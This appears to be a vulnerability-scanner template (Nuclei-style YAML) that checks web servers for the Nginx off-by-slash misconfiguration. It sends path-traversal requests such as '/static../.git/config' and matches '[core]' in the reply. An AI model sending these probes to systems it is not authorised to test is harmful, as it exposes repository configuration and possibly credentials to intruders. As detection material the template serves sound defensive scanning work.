id: git-config-nginxoffbyslash info: name: Nginx off-by-slash exposes Git config author: organiccrap severity: medium # https://twitter.com/Random_Robbie/status/1262676628167110656 description: Nginx off-by-slash vulnerability exposes Git configuration. requests: - method: GET path: - '{{BaseURL}}/static../.git/config' - '{{BaseURL}}/js../.git/config' - '{{BaseURL}}/images../.git/config' - '{{BaseURL}}/img../.git/config' - '{{BaseURL}}/css../.git/config' - '{{BaseURL}}/assets../.git/config' - '{{BaseURL}}/content../.git/config' - '{{BaseURL}}/events../.git/config' - '{{BaseURL}}/media../.git/config' - '{{BaseURL}}/lib../.git/config' headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers: - type: word words: - '[core]'